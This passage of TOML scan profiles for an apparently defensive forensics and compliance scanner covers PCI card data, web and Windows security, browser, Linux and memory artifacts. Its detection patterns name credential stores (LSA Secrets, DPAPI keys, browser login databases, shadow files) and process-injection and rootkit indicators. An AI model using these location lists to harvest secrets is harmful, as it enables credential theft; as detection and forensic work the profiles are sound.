  name = "Suspicious Process Name"
  pattern = "(?:svchost|lsass|csrss|winlogon|explorer)\\.exe"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Rootkit Indicator"
  pattern = "(?:hidden.*process|DKOM|SSDT.*hook)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Injected Code"
  pattern = "(?:code.*inject|remote.*thread|process.*hollow)"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Active Malicious Activity"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name LIKE '%Suspicious%' OR pattern_name LIKE '%Inject%' OR pattern_name LIKE '%Rootkit%'"

[[signatures]]
  name = "Live System State"
  query = "SELECT sha256 FROM pattern_matches WHERE pattern_name IN ('Running Process', 'Active Connection', 'Logged In User', 'System Uptime')"

[[signatures]]
  name = "Volatile Artifacts"
  query = "SELECT sha256, COUNT(*) as volatile_count FROM pattern_matches WHERE pattern_name LIKE '%History%' OR pattern_name LIKE '%MRU%' OR pattern_name LIKE '%Recent%' GROUP BY sha256 HAVING volatile_count > 2"

Profile: composite/pci-compliance.toml

Source

Original path: profiles/composite/pci-compliance.toml

Profile (TOML)

# PCI DSS Compliance Profile
# Payment Card Industry Data Security Standard compliance scanning

includes = [
  "../base/compliance.toml",
  "../base/credentials.toml",
  "../base/crypto.toml"
]

# Additional PCI-specific patterns
[[patterns]]
  name = "Track Data - Full Magnetic Stripe"
  pattern = "%[A-Z]\\d{13,19}\\^[^\\?]+\\?[^\\?]+\\?"
  type = "regex"

[[patterns]]
  name = "Track Data - CVV/CVC"
  pattern = "(?:cvv|cvc|cid|cav)\\s*[:=]?\\s*\\d{3,4}"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Track Data - PIN"
  pattern = "(?:pin|pinblock)\\s*[:=]?\\s*\\d{4,}"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Primary Account Number (PAN)"
  pattern = "\\b(?:4\\d{15}|5[1-5]\\d{14}|3[47]\\d{13}|6011\\d{12})\\b"
  type = "regex"

[[patterns]]
  name = "Payment Gateway Configuration"
  pattern = "(?:stripe|paypal|square|authorize\\.net|braintree).*(?:api[_-]?key|secret|token)"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "PCI Sensitive Data"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name LIKE '%Credit Card%' OR pattern_name LIKE '%Track Data%' OR pattern_name LIKE '%CVV%' OR pattern_name LIKE '%PIN%'"

[[signatures]]
  name = "Unencrypted Card Data"
  query = "SELECT sha256 FROM pattern_matches WHERE pattern_name LIKE '%Credit Card%' AND sha256 NOT IN (SELECT sha256 FROM pattern_matches WHERE pattern_name LIKE '%AES%' OR pattern_name LIKE '%Encryption%')"

Profile: composite/security-audit.toml

Source

Original path: profiles/composite/security-audit.toml

Profile (TOML)

# Security Audit Profile
# Comprehensive security audit combining credentials, malware, and web security

includes = [
  "../base/credentials.toml",
  "../base/malware.toml",
  "../base/web.toml"
]

# Additional patterns specific to security audits
[[patterns]]
  name = "Debug Mode Enabled"
  pattern = "(?:debug|DEBUG)\\s*[:=]\\s*(?:true|True|1|yes|on)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Verbose Logging"
  pattern = "(?:log.?level|logging)\\s*[:=]\\s*(?:debug|DEBUG|trace|TRACE)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Development Environment"
  pattern = "(?:env|environment)\\s*[:=]\\s*(?:dev|development|local)"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Critical Security Issues"
  query = "SELECT sha256, COUNT(*) as issue_count FROM pattern_matches WHERE pattern_name IN ('AWS Access Key', 'Private Key Header', 'SQL Injection Pattern', 'XSS Script Tag', 'Command Injection') GROUP BY sha256 HAVING issue_count > 0"

Profile: composite/web-app-security.toml

Source

Original path: profiles/composite/web-app-security.toml

Profile (TOML)

# Web Application Security Profile
# Comprehensive web application vulnerability scanning

includes = [
  "../base/web.toml",
  "../base/credentials.toml",
  "../base/crypto.toml"
]

decode = ["base64", "percent-encoding", "html-entity", "unicode-escape-sequences"]

# Additional web-specific patterns
[[patterns]]
  name = "Hardcoded Database Credentials"
  pattern = "(?:jdbc:|mongodb:|mysql:|postgresql:|oracle:).*(?:user(?:name)?|password|pwd)\\s*[:=]\\s*[\"'][^\"']+[\"']"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Exposed Admin Panel"
  pattern = "/admin|/administrator|/wp-admin|/phpmyadmin|/adminer"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Default Credentials"
  pattern = "(?:admin|root|administrator)\\s*[:=]\\s*(?:admin|password|123456|root)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Session Token in URL"
  pattern = "(?:session|token|auth)\\s*=\\s*[a-zA-Z0-9]{20,}"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Information Disclosure"
  pattern = "(?:stack.?trace|exception|error|warning|debug).*(?:at\\s+[a-zA-Z0-9_.]+\\(|line\\s+\\d+)"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Critical Web Vulnerabilities"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('SQL Injection Pattern', 'XSS Script Tag', 'Command Injection', 'Path Traversal', 'Hardcoded Database Credentials')"

[[signatures]]
  name = "Authentication Issues"
  query = "SELECT sha256 FROM pattern_matches WHERE pattern_name LIKE '%Credentials%' OR pattern_name LIKE '%Password%' OR pattern_name LIKE '%Session%'"

Profile: composite/windows-forensics.toml

Source

Original path: profiles/composite/windows-forensics.toml

Profile (TOML)

# Windows Forensics Profile
# Inspired by KAPE's Windows-specific targets
# Comprehensive Windows artifact detection

includes = [
  "../base/forensics.toml",
  "../base/system-artifacts.toml",
  "../base/browser-artifacts.toml"
]

# Windows Registry Artifacts
[[patterns]]
  name = "HKLM Registry Path"
  pattern = "HKEY_LOCAL_MACHINE\\\\[A-Za-z0-9\\\\]+"
  type = "regex"

[[patterns]]
  name = "HKCU Registry Path"
  pattern = "HKEY_CURRENT_USER\\\\[A-Za-z0-9\\\\]+"
  type = "regex"

[[patterns]]
  name = "HKCR Registry Path"
  pattern = "HKEY_CLASSES_ROOT\\\\[A-Za-z0-9\\\\]+"
  type = "regex"

[[patterns]]
  name = "RecentDocs"
  pattern = "RecentDocs"
  type = "string"

[[patterns]]
  name = "ComDlg32"
  pattern = "ComDlg32\\\\(?:OpenSavePidlMRU|LastVisitedPidlMRU)"
  type = "regex"

[[patterns]]
  name = "MountPoints2"
  pattern = "MountPoints2"
  type = "string"

# Windows Event Log Patterns
[[patterns]]
  name = "Security Event ID"
  pattern = "(?:Event ID|EventID)\\s*:\\s*(?:4624|4625|4672|4720|4732)"
  type = "regex"

[[patterns]]
  name = "Logon Event"
  pattern = "(?:successful logon|failed logon|logon type)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Account Creation"
  pattern = "(?:account.*created|new.*user.*account)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Privilege Use"
  pattern = "(?:privilege.*use|sensitive privilege)"
  case-insensitive = true
  type = "regex"

# Windows Execution Artifacts
[[patterns]]
  name = "Prefetch Execution"
  pattern = "[A-Z0-9]{8}\\.pf"
  type = "regex"

[[patterns]]
  name = "AppCompatCache Entry"
  pattern = "(?:AppCompatCache|ShimCache).*LastModified"
  type = "regex"

[[patterns]]
  name = "BAM/DAM Entry"
  pattern = "(?:BAM|DAM)\\\\State\\\\UserSettings"
  type = "regex"

[[patterns]]
  name = "Windows Timeline"
  pattern = "ActivitiesCache\\.db"
  type = "regex"

# Windows File System
[[patterns]]
  name = "Alternate Data Stream"
  pattern = ":[^:]+:\\$DATA"
  type = "regex"

[[patterns]]
  name = "Zone.Identifier"
  pattern = ":Zone\\.Identifier"
  type = "string"

[[patterns]]
  name = "NTFS Journal"
  pattern = "\\$(?:UsnJrnl|LogFile|Extend)"
  type = "regex"

# Windows Network Artifacts
[[patterns]]
  name = "Network Profile"
  pattern = "NetworkList\\\\Profiles"
  type = "regex"

[[patterns]]
  name = "Wireless Network"
  pattern = "(?:WLAN|WiFi).*profile"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "VPN Connection"
  pattern = "(?:Pbk|rasphone)\\.pbk"
  case-insensitive = true
  type = "regex"

# Windows Application Artifacts
[[patterns]]
  name = "Office Recent Files"
  pattern = "(?:Excel|Word|PowerPoint).*Recent"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Windows Store App"
  pattern = "Packages\\\\[^\\\\]+\\\\AC"
  type = "regex"

[[patterns]]
  name = "UWP App Data"
  pattern = "Microsoft\\.Windows\\..*_.*\\\\LocalState"
  type = "regex"

# Windows Security
[[patterns]]
  name = "Credential Manager"
  pattern = "Credentials\\\\[A-F0-9]{32}"
  type = "regex"

[[patterns]]
  name = "Windows Vault"
  pattern = "Microsoft\\\\Vault"
  type = "regex"

[[patterns]]
  name = "DPAPI Master Key"
  pattern = "Microsoft\\\\Protect.*[A-F0-9]{8}-(?:[A-F0-9]{4}-){3}[A-F0-9]{12}"
  type = "regex"

[[patterns]]
  name = "LSA Secrets"
  pattern = "SECURITY\\\\Policy\\\\Secrets"
  type = "regex"

[[signatures]]
  name = "Windows Execution Evidence"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('Prefetch Execution', 'AppCompatCache Entry', 'BAM/DAM Entry', 'Windows Timeline')"

[[signatures]]
  name = "Windows User Activity"
  query = "SELECT sha256 FROM pattern_matches WHERE pattern_name IN ('RecentDocs', 'ComDlg32', 'Office Recent Files', 'TypedURLs', 'RunMRU')"

[[signatures]]
  name = "Windows Security Events"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name LIKE '%Event%' OR pattern_name LIKE '%Logon%' OR pattern_name LIKE '%Account%'"

Profile: modules/browser/all-browsers.toml

Source

Original path: profiles/modules/browser/all-browsers.toml

Profile (TOML)

# All Browsers Compound Module
# Combines all browser artifact modules

[module]
name = "All Browser Artifacts"
description = "Comprehensive browser artifact collection (Chrome, Firefox, Edge, Safari)"
category = "browser"
platform = ["windows", "linux", "macos"]
priority = "high"

# Include individual browser modules
includes = [
  "chrome.toml",
  "firefox.toml",
  "edge.toml",
  "safari.toml"
]

# Additional cross-browser patterns
[[patterns]]
  name = "Browser SQLite Database"
  pattern = "\\.(sqlite|db)$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Browser JSON Data"
  pattern = "(?:history|bookmarks|cookies|logins|preferences)\\.json"
  case-insensitive = true
  type = "regex"

# Signatures for browser artifacts
[[signatures]]
  name = "Multiple Browser Artifacts"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as browser_artifacts FROM pattern_matches WHERE pattern_name LIKE '%Browser%' OR pattern_name LIKE '%Chrome%' OR pattern_name LIKE '%Firefox%' OR pattern_name LIKE '%Edge%' OR pattern_name LIKE '%Safari%' GROUP BY sha256 HAVING browser_artifacts > 3"

Profile: modules/browser/chrome.toml

Source

Original path: profiles/modules/browser/chrome.toml

Profile (TOML)

# Chrome/Chromium Browser Artifacts Module
# Collects Chrome and Chromium-based browser artifacts

[module]
name = "Chrome Browser Artifacts"
description = "Chrome/Chromium history, cookies, login data, bookmarks, and cache"
category = "browser"
platform = ["windows", "linux", "macos"]
priority = "high"

decode = ["base64", "percent-encoding"]

# Chrome History
[[patterns]]
  name = "Chrome History Database"
  pattern = "(?:Chrome|Chromium).*History"
  case-insensitive = true
  type = "regex"

# Chrome Login Data (saved passwords)
[[patterns]]
  name = "Chrome Login Data"
  pattern = "(?:Chrome|Chromium).*Login Data"
  case-insensitive = true
  type = "regex"

# Chrome Cookies
[[patterns]]
  name = "Chrome Cookies"
  pattern = "(?:Chrome|Chromium).*Cookies"
  case-insensitive = true
  type = "regex"

# Chrome Web Data (autofill, credit cards)
[[patterns]]
  name = "Chrome Web Data"
  pattern = "(?:Chrome|Chromium).*Web Data"
  case-insensitive = true
  type = "regex"

# Chrome Bookmarks
[[patterns]]
  name = "Chrome Bookmarks"
  pattern = "(?:Chrome|Chromium).*Bookmarks"
  case-insensitive = true
  type = "regex"

# Chrome Extensions
[[patterns]]
  name = "Chrome Extensions"
  pattern = "(?:Chrome|Chromium).*Extensions"
  case-insensitive = true
  type = "regex"

# Chrome Cache
[[patterns]]
  name = "Chrome Cache"
  pattern = "(?:Chrome|Chromium).*Cache"
  case-insensitive = true
  type = "regex"

# Chrome Download History
[[patterns]]
  name = "Chrome Downloads"
  pattern = "(?:Chrome|Chromium).*Downloads"
  case-insensitive = true
  type = "regex"

# Chrome Preferences
[[patterns]]
  name = "Chrome Preferences"
  pattern = "(?:Chrome|Chromium).*Preferences"
  case-insensitive = true
  type = "regex"

# Chrome Top Sites
[[patterns]]
  name = "Chrome Top Sites"
  pattern = "(?:Chrome|Chromium).*Top Sites"
  case-insensitive = true
  type = "regex"

Profile: modules/browser/edge.toml

Source

Original path: profiles/modules/browser/edge.toml

Profile (TOML)

# Edge Browser Artifacts Module
# Collects Microsoft Edge browser artifacts

[module]
name = "Edge Browser Artifacts"
description = "Microsoft Edge history, cookies, and WebCache"
category = "browser"
platform = ["windows"]
priority = "high"

decode = ["base64", "percent-encoding"]

# Edge History
[[patterns]]
  name = "Edge History"
  pattern = "Edge.*History"
  case-insensitive = true
  type = "regex"

# Edge Cookies
[[patterns]]
  name = "Edge Cookies"
  pattern = "Edge.*Cookies"
  case-insensitive = true
  type = "regex"

# Edge WebCache
[[patterns]]
  name = "Edge WebCache"
  pattern = "WebCacheV\\d+\\.dat"
  case-insensitive = true
  type = "regex"

# Edge Bookmarks
[[patterns]]
  name = "Edge Bookmarks"
  pattern = "Edge.*Bookmarks"
  case-insensitive = true
  type = "regex"

# Edge Login Data
[[patterns]]
  name = "Edge Login Data"
  pattern = "Edge.*Login Data"
  case-insensitive = true
  type = "regex"

Profile: modules/browser/firefox.toml

Source

Original path: profiles/modules/browser/firefox.toml

Profile (TOML)

# Firefox Browser Artifacts Module
# Collects Mozilla Firefox browser artifacts

[module]
name = "Firefox Browser Artifacts"
description = "Firefox history, cookies, bookmarks, and downloads"
category = "browser"
platform = ["windows", "linux", "macos"]
priority = "high"

decode = ["base64", "percent-encoding"]

# Firefox Places (history and bookmarks)
[[patterns]]
  name = "Firefox Places Database"
  pattern = "places\\.sqlite"
  case-insensitive = true
  type = "regex"

# Firefox Cookies
[[patterns]]
  name = "Firefox Cookies"
  pattern = "cookies\\.sqlite"
  case-insensitive = true
  type = "regex"

# Firefox Downloads
[[patterns]]
  name = "Firefox Downloads"
  pattern = "downloads\\.sqlite"
  case-insensitive = true
  type = "regex"

# Firefox Logins (saved passwords)
[[patterns]]
  name = "Firefox Logins"
  pattern = "logins\\.json"
  case-insensitive = true
  type = "regex"

# Firefox Form History
[[patterns]]
  name = "Firefox Form History"
  pattern = "formhistory\\.sqlite"
  case-insensitive = true
  type = "regex"

# Firefox Cache
[[patterns]]
  name = "Firefox Cache"
  pattern = "Firefox.*[Cc]ache"
  case-insensitive = true
  type = "regex"

# Firefox Bookmarks Backup
[[patterns]]
  name = "Firefox Bookmarks Backup"
  pattern = "bookmarkbackups"
  case-insensitive = true
  type = "regex"

# Firefox Session Store
[[patterns]]
  name = "Firefox Session Store"
  pattern = "sessionstore\\.(?:js|jsonlz4)"
  case-insensitive = true
  type = "regex"

# Firefox Extensions
[[patterns]]
  name = "Firefox Extensions"
  pattern = "extensions\\.(?:json|sqlite)"
  case-insensitive = true
  type = "regex"

# Firefox Preferences
[[patterns]]
  name = "Firefox Preferences"
  pattern = "prefs\\.js"
  case-insensitive = true
  type = "regex"

Profile: modules/browser/safari.toml

Source

Original path: profiles/modules/browser/safari.toml

Profile (TOML)

# Safari Browser Artifacts Module
# Collects Apple Safari browser artifacts

[module]
name = "Safari Browser Artifacts"
description = "Safari history, cookies, and cache"
category = "browser"
platform = ["macos"]
priority = "high"

decode = ["base64", "percent-encoding"]

# Safari History
[[patterns]]
  name = "Safari History"
  pattern = "History\\.db"
  case-insensitive = true
  type = "regex"

# Safari Cookies
[[patterns]]
  name = "Safari Cookies"
  pattern = "Cookies\\.binarycookies"
  case-insensitive = true
  type = "regex"

# Safari Downloads
[[patterns]]
  name = "Safari Downloads"
  pattern = "Downloads\\.plist"
  case-insensitive = true
  type = "regex"

# Safari Bookmarks
[[patterns]]
  name = "Safari Bookmarks"
  pattern = "Bookmarks\\.plist"
  case-insensitive = true
  type = "regex"

# Safari Cache
[[patterns]]
  name = "Safari Cache"
  pattern = "Cache\\.db"
  case-insensitive = true
  type = "regex"

Profile: modules/linux/all-linux.toml

Source

Original path: profiles/modules/linux/all-linux.toml

Profile (TOML)

# All Linux Compound Module
# Combines all Linux artifact modules

[module]
name = "All Linux Artifacts"
description = "Comprehensive Linux artifact collection (logs, bash history, user activity)"
category = "linux"
platform = ["linux"]
priority = "high"

# Include individual Linux modules
includes = [
  "logs.toml",
  "bash-history.toml",
  "user-activity.toml"
]

# Additional cross-Linux patterns
[[patterns]]
  name = "Passwd File"
  pattern = "(?:^|[/])passwd$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Shadow File"
  pattern = "(?:^|[/])shadow$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Group File"
  pattern = "(?:^|[/])group$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Sudoers File"
  pattern = "(?:^|[/])sudoers(?:\\.d)?$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Hosts File"
  pattern = "(?:^|[/])hosts$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Fstab"
  pattern = "(?:^|[/])fstab$"
  case-insensitive = true
  type = "regex"

# Signatures for Linux artifacts
[[signatures]]
  name = "Multiple Linux Artifacts"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as linux_artifacts FROM pattern_matches WHERE pattern_name LIKE '%Linux%' OR pattern_name LIKE '%Bash%' OR pattern_name LIKE '%Log%' OR pattern_name LIKE '%SSH%' GROUP BY sha256 HAVING linux_artifacts > 3"

Profile: modules/linux/bash-history.toml

Source

Original path: profiles/modules/linux/bash-history.toml

Profile (TOML)

# Linux Bash History Module
# Collects shell history files for command analysis

[module]
name = "Bash History Artifacts"
description = "Shell history files (bash, zsh, fish, etc.)"
category = "linux"
platform = ["linux", "macos"]
priority = "high"

# Bash History
[[patterns]]
  name = "Bash History"
  pattern = "\\.bash_history$"
  case-insensitive = true
  type = "regex"

# Zsh History
[[patterns]]
  name = "Zsh History"
  pattern = "\\.zsh_history$"
  case-insensitive = true
  type = "regex"

# Fish History
[[patterns]]
  name = "Fish History"
  pattern = "fish_history$"
  case-insensitive = true
  type = "regex"

# Sh History
[[patterns]]
  name = "Sh History"
  pattern = "\\.sh_history$"
  case-insensitive = true
  type = "regex"

# Ksh History
[[patterns]]
  name = "Ksh History"
  pattern = "\\.ksh_history$"
  case-insensitive = true
  type = "regex"

# Tcsh History
[[patterns]]
  name = "Tcsh History"
  pattern = "\\.history$"
  case-insensitive = true
  type = "regex"

# Bash Profile/RC
[[patterns]]
  name = "Bash RC"
  pattern = "\\.bashrc$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Bash Profile"
  pattern = "\\.bash_profile$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Bash Logout"
  pattern = "\\.bash_logout$"
  case-insensitive = true
  type = "regex"

# Zsh RC files
[[patterns]]
  name = "Zsh RC"
  pattern = "\\.zshrc$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Zsh Profile"
  pattern = "\\.zprofile$"
  case-insensitive = true
  type = "regex"

# Profile
[[patterns]]
  name = "Profile"
  pattern = "\\.profile$"
  case-insensitive = true
  type = "regex"

# MySQL History
[[patterns]]
  name = "MySQL History"
  pattern = "\\.mysql_history$"
  case-insensitive = true
  type = "regex"

# Python History
[[patterns]]
  name = "Python History"
  pattern = "\\.python_history$"
  case-insensitive = true
  type = "regex"

# Node REPL History
[[patterns]]
  name = "Node REPL History"
  pattern = "\\.node_repl_history$"
  case-insensitive = true
  type = "regex"

# SQLite History
[[patterns]]
  name = "SQLite History"
  pattern = "\\.sqlite_history$"
  case-insensitive = true
  type = "regex"

# Less History
[[patterns]]
  name = "Less History"
  pattern = "\\.lesshst$"
  case-insensitive = true
  type = "regex"

# Vim Info
[[patterns]]
  name = "Vim Info"
  pattern = "\\.viminfo$"
  case-insensitive = true
  type = "regex"

Profile: modules/linux/logs.toml

Source

Original path: profiles/modules/linux/logs.toml

Profile (TOML)

# Linux System Logs Module
# Collects Linux system log files for forensic analysis

[module]
name = "Linux System Logs"
description = "Linux system logs (syslog, auth, daemon, kernel, etc.)"
category = "linux"
platform = ["linux"]
priority = "high"

# Syslog
[[patterns]]
  name = "Syslog"
  pattern = "(?:^|[/])syslog(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Auth/Secure Log
[[patterns]]
  name = "Auth Log"
  pattern = "(?:^|[/])(?:auth|secure)(?:\\.log)?(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Kernel Log
[[patterns]]
  name = "Kernel Log"
  pattern = "(?:^|[/])(?:kern|kernel)\\.log(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Daemon Log
[[patterns]]
  name = "Daemon Log"
  pattern = "(?:^|[/])daemon\\.log(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Dmesg
[[patterns]]
  name = "Dmesg Log"
  pattern = "(?:^|[/])dmesg(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Boot Log
[[patterns]]
  name = "Boot Log"
  pattern = "(?:^|[/])boot\\.log(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Cron Log
[[patterns]]
  name = "Cron Log"
  pattern = "(?:^|[/])cron(?:\\.log)?(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Faillog
[[patterns]]
  name = "Faillog"
  pattern = "(?:^|[/])faillog$"
  case-insensitive = true
  type = "regex"

# Lastlog
[[patterns]]
  name = "Lastlog"
  pattern = "(?:^|[/])lastlog$"
  case-insensitive = true
  type = "regex"

# Btmp (failed login attempts)
[[patterns]]
  name = "Btmp Log"
  pattern = "(?:^|[/])btmp(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Wtmp (login records)
[[patterns]]
  name = "Wtmp Log"
  pattern = "(?:^|[/])wtmp(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Utmp (current logins)
[[patterns]]
  name = "Utmp Log"
  pattern = "(?:^|[/])utmp$"
  case-insensitive = true
  type = "regex"

# Messages
[[patterns]]
  name = "Messages Log"
  pattern = "(?:^|[/])messages(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Journal logs (systemd)
[[patterns]]
  name = "Journal Log"
  pattern = "\\.journal$"
  case-insensitive = true
  type = "regex"

# Audit logs
[[patterns]]
  name = "Audit Log"
  pattern = "(?:^|[/])audit\\.log(?:\\.[0-9]+)?(?:\\.gz)?$"
  case-insensitive = true
  type = "regex"

# Var/log directory
[[patterns]]
  name = "Var Log Directory"
  pattern = "/var/log/"
  case-insensitive = false
  type = "regex"

Profile: modules/linux/user-activity.toml

Source

Original path: profiles/modules/linux/user-activity.toml

Profile (TOML)

# Linux User Activity Module
# Collects user activity artifacts for forensic analysis

[module]
name = "Linux User Activity"
description = "User activity artifacts (recent files, trash, thumbnails, etc.)"
category = "linux"
platform = ["linux"]
priority = "medium"

# Recently Used (GNOME/GTK)
[[patterns]]
  name = "Recently Used"
  pattern = "recently-used\\.xbel"
  case-insensitive = true
  type = "regex"

# Trash Files
[[patterns]]
  name = "Trash Info"
  pattern = "\\.Trash.*\\.trashinfo$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Trash Files"
  pattern = "\\.Trash-[0-9]+/files/"
  case-insensitive = true
  type = "regex"

# Thumbnails
[[patterns]]
  name = "Thumbnails"
  pattern = "\\.cache/thumbnails/"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Thumbnail Database"
  pattern = "thumbs-[0-9]+\\.db$"
  case-insensitive = true
  type = "regex"

# Desktop Files
[[patterns]]
  name = "Desktop Entry"
  pattern = "\\.desktop$"
  case-insensitive = true
  type = "regex"

# XDG User Directories
[[patterns]]
  name = "User Dirs Config"
  pattern = "user-dirs\\.(?:dirs|locale)$"
  case-insensitive = true
  type = "regex"

# GNOME Tracker Database
[[patterns]]
  name = "Tracker Database"
  pattern = "tracker.*\\.db$"
  case-insensitive = true
  type = "regex"

# KDE Activity Manager
[[patterns]]
  name = "KDE Activities"
  pattern = "kactivitymanagerd.*\\.db$"
  case-insensitive = true
  type = "regex"

# Zeitgeist (GNOME Activity Journal)
[[patterns]]
  name = "Zeitgeist Activity"
  pattern = "zeitgeist.*\\.db$"
  case-insensitive = true
  type = "regex"

# Crontab
[[patterns]]
  name = "Crontab"
  pattern = "(?:^|[/])crontab$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "User Crontab"
  pattern = "/var/spool/cron/"
  case-insensitive = false
  type = "regex"

# SSH Known Hosts
[[patterns]]
  name = "SSH Known Hosts"
  pattern = "known_hosts$"
  case-insensitive = true
  type = "regex"

# SSH Authorized Keys
[[patterns]]
  name = "SSH Authorized Keys"
  pattern = "authorized_keys$"
  case-insensitive = true
  type = "regex"

# SSH Config
[[patterns]]
  name = "SSH Config"
  pattern = "\\.ssh/config$"
  case-insensitive = true
  type = "regex"

# GPG Keys
[[patterns]]
  name = "GPG Keyring"
  pattern = "\\.gnupg/"
  case-insensitive = true
  type = "regex"

# Firefox/Chrome Profiles (for user activity context)
[[patterns]]
  name = "Mozilla Profiles"
  pattern = "\\.mozilla/"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Chrome Config"
  pattern = "\\.config/(?:google-chrome|chromium)/"
  case-insensitive = true
  type = "regex"

# Systemd User Units
[[patterns]]
  name = "Systemd User Units"
  pattern = "\\.config/systemd/user/"
  case-insensitive = true
  type = "regex"

# Autostart Applications
[[patterns]]
  name = "Autostart Applications"
  pattern = "\\.config/autostart/"
  case-insensitive = true
  type = "regex"

# X Session Errors
[[patterns]]
  name = "X Session Errors"
  pattern = "\\.xsession-errors"
  case-insensitive = true
  type = "regex"

Profile: modules/memory/all-memory.toml

Source

Original path: profiles/modules/memory/all-memory.toml

Profile (TOML)

# All Memory Compound Module
# Combines all memory-related artifact modules

[module]
name = "All Memory Artifacts"
description = "Comprehensive memory artifact collection (dumps, hibernation, swap)"
category = "memory"
platform = ["windows", "linux", "macos"]
priority = "critical"

# Include individual memory modules
includes = [
  "dumps.toml",
  "hibernation.toml"
]

# Additional memory-related patterns
[[patterns]]
  name = "Virtual Memory File"
  pattern = "\\.(?:vmem|vmsn|vmss)$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Hyper-V Memory"
  pattern = "\\.vsv$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "QEMU Memory"
  pattern = "\\.(?:qcow2?|raw)$"
  case-insensitive = true
  type = "regex"

# Signatures for memory artifacts
[[signatures]]
  name = "Multiple Memory Artifacts"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as memory_artifacts FROM pattern_matches WHERE pattern_name LIKE '%Memory%' OR pattern_name LIKE '%Dump%' OR pattern_name LIKE '%Hibernation%' OR pattern_name LIKE '%Swap%' OR pattern_name LIKE '%Page%' GROUP BY sha256 HAVING memory_artifacts > 2"

Profile: modules/memory/dumps.toml

Source

Original path: profiles/modules/memory/dumps.toml

Profile (TOML)

# Memory Dumps Module
# Collects memory dump files for forensic analysis

[module]
name = "Memory Dumps"
description = "Memory dump files (crash dumps, core dumps, process dumps)"
category = "memory"
platform = ["windows", "linux", "macos"]
priority = "critical"

# Windows Memory Dumps
[[patterns]]
  name = "Windows Memory Dump"
  pattern = "MEMORY\\.DMP$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Windows Mini Dump"
  pattern = "\\.dmp$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Windows Kernel Dump"
  pattern = "(?:KERNEL|MINI).*\\.DMP$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Windows Complete Memory Dump"
  pattern = "FULL.*\\.DMP$"
  case-insensitive = true
  type = "regex"

# Windows WER (Windows Error Reporting)
[[patterns]]
  name = "WER Dump"
  pattern = "(?:WER|Report).*\\.dmp$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "WER Report"
  pattern = "Report\\.wer$"
  case-insensitive = true
  type = "regex"

# Windows Crash Dumps Directory
[[patterns]]
  name = "Windows Crash Dumps"
  pattern = "(?:Minidump|CrashDumps)"
  case-insensitive = true
  type = "regex"

# Linux Core Dumps
[[patterns]]
  name = "Linux Core Dump"
  pattern = "(?:^|[/])core(?:\\.[0-9]+)?$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Linux Coredump Pattern"
  pattern = "core\\.[0-9]+$"
  case-insensitive = true
  type = "regex"

# macOS Crash Reports
[[patterns]]
  name = "macOS Crash Report"
  pattern = "\\.crash$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "macOS Panic Report"
  pattern = "\\.panic$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "macOS Hang Report"
  pattern = "\\.hang$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "macOS Spin Report"
  pattern = "\\.spin$"
  case-insensitive = true
